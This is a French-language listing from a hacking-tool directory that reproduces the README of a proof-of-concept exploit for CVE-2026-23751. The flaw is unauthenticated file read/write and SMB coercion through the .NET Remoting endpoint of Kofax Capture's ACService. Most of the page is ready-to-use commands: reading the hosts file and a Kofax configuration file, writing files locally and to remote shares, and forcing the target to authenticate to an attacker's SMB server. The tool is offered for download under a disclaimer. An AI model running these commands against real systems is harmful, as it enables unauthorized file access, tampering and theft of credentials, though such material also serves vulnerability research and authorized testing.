Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23751-poc — Client Remoting corrigé pour exploiter CVE-2026-23751 (Tungsten Automation - Kofax Capture : lecture/écriture de fichiers non authentifiée et coercition SMB via .NET HTTP Remoting) | Kitploit
Outils/GitHubGitHub/siebrum/cve-2026-23751-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubsiebrum/cve-2026-23751-poc

CVE-2026-23751-poc

Client Remoting corrigé pour exploiter CVE-2026-23751 (Tungsten Automation - Kofax Capture : lecture/écriture de fichiers non authentifiée et coercition SMB via .NET HTTP Remoting)

Voir le dépôt
il y a 6h 37mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23751-poc

Réimplémentation de preuve de concept de la technique décrite dans Code White's NewRemotingTricks, ciblant Tungsten Automation Kofax Capture.

CVE-2026-23751

Titre : Tungsten Automation - Kofax Capture Lecture/Écriture de fichiers non authentifiée et coercition SMB via .NET HTTP Remoting

CVE : CVE-2026-23751

Description

CVE-2026-23751 affecte Tungsten Automation Kofax Capture et permet à un attaquant distant non authentifié d'interagir avec un point de terminaison .NET HTTP Remoting exposé par le ACService de Kofax Capture.

La vulnérabilité peut être exploitée pour effectuer :

  • Des lectures arbitraires de fichiers non authentifiées
  • Des écritures arbitraires de fichiers non authentifiées
  • Une coercition d'authentification SMB
  • L'accès aux fichiers locaux accessibles au service Kofax Capture
  • L'accès aux fichiers distants via des chemins UNC

Le PoC réimplémente la technique .NET Remoting pertinente du projet NewRemotingTricks de Code White.

Point de terminaison affecté

Le PoC cible le point de terminaison HTTP Remoting de Kofax Capture :

ACService
root@kitploit:~
http://<target>:2424/ACService

Le port 2424 est le port HTTP Remoting par défaut utilisé par le service affecté.

Utilisation

Lire un fichier local

L'exemple suivant lit le fichier hosts de Windows sur la cible :

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts

Un fichier de configuration de Kofax Capture peut être lu de la même manière :

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml

Écrire un fichier local

Un fichier peut être écrit dans un emplacement accessible par le service Kofax Capture en fournissant le chemin cible suivi du contenu :

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld

Écrire sur un partage SMB distant

La même fonctionnalité peut être utilisée avec un chemin UNC pour écrire sur un partage SMB distant :

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld

La capacité d'accéder à la ressource distante dépend des autorisations et du contexte de sécurité du service Kofax Capture.

Coercition SMB

Une URI file:// peut être fournie pour amener la cible à accéder à une ressource SMB distante :

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt

Cela peut amener l'hôte affecté à s'authentifier auprès du serveur SMB contrôlé par l'attaquant, selon l'environnement cible et sa configuration de sécurité.

Contexte technique

La vulnérabilité implique l'utilisation de .NET HTTP Remoting par le ACService de Kofax Capture.

.NET Remoting prend en charge divers schémas d'URI et mécanismes de sérialisation d'objets. En interagissant d'une manière spécifique avec le point de terminaison remoting exposé, un client non authentifié peut amener le service à effectuer des opérations sur le système de fichiers en utilisant des chemins fournis par le client.

Le PoC démontre comment ce comportement peut être utilisé pour :

  • Récupérer des fichiers locaux
  • Écrire des données dans des fichiers locaux
  • Accéder à des chemins UNC/SMB distants
  • Déclencher l'accès à des ressources file:// distantes

Le PoC démontre actuellement l'écriture de données de type chaîne dans des fichiers. D'autres types de fichiers et formats de charge utile peuvent être pris en charge en modifiant le code source en conséquence.

Cette implémentation est basée sur les recherches et techniques présentées dans :

Code White - NewRemotingTricks

https://github.com/codewhitesec/NewRemotingTricks/tree/main

Prérequis

  • Windows
  • Accès réseau au ACService de Kofax Capture de la cible
  • Instance de Kofax Capture exposant le point de terminaison HTTP Remoting affecté
  • RemotingClient_MBRO_Lazy.exe

Aucune authentification auprès du service Kofax Capture n'est requise pour l'exploitation.

Avertissement

Ce dépôt est fourni à des fins de recherche en sécurité, de validation de vulnérabilités et de tests d'intrusion autorisés uniquement.

N'utilisez pas ce PoC contre des systèmes sans autorisation explicite. L'auteur n'est pas responsable des dommages, pertes de données, accès non autorisés ou autres conséquences résultant d'une mauvaise utilisation de ce logiciel.

Références

  • CVE-2026-23751 — Tungsten Automation Kofax Capture Lecture/Écriture de fichiers non authentifiée et coercition SMB via .NET HTTP Remoting
  • Code White - NewRemotingTricks
Télécharger l’outil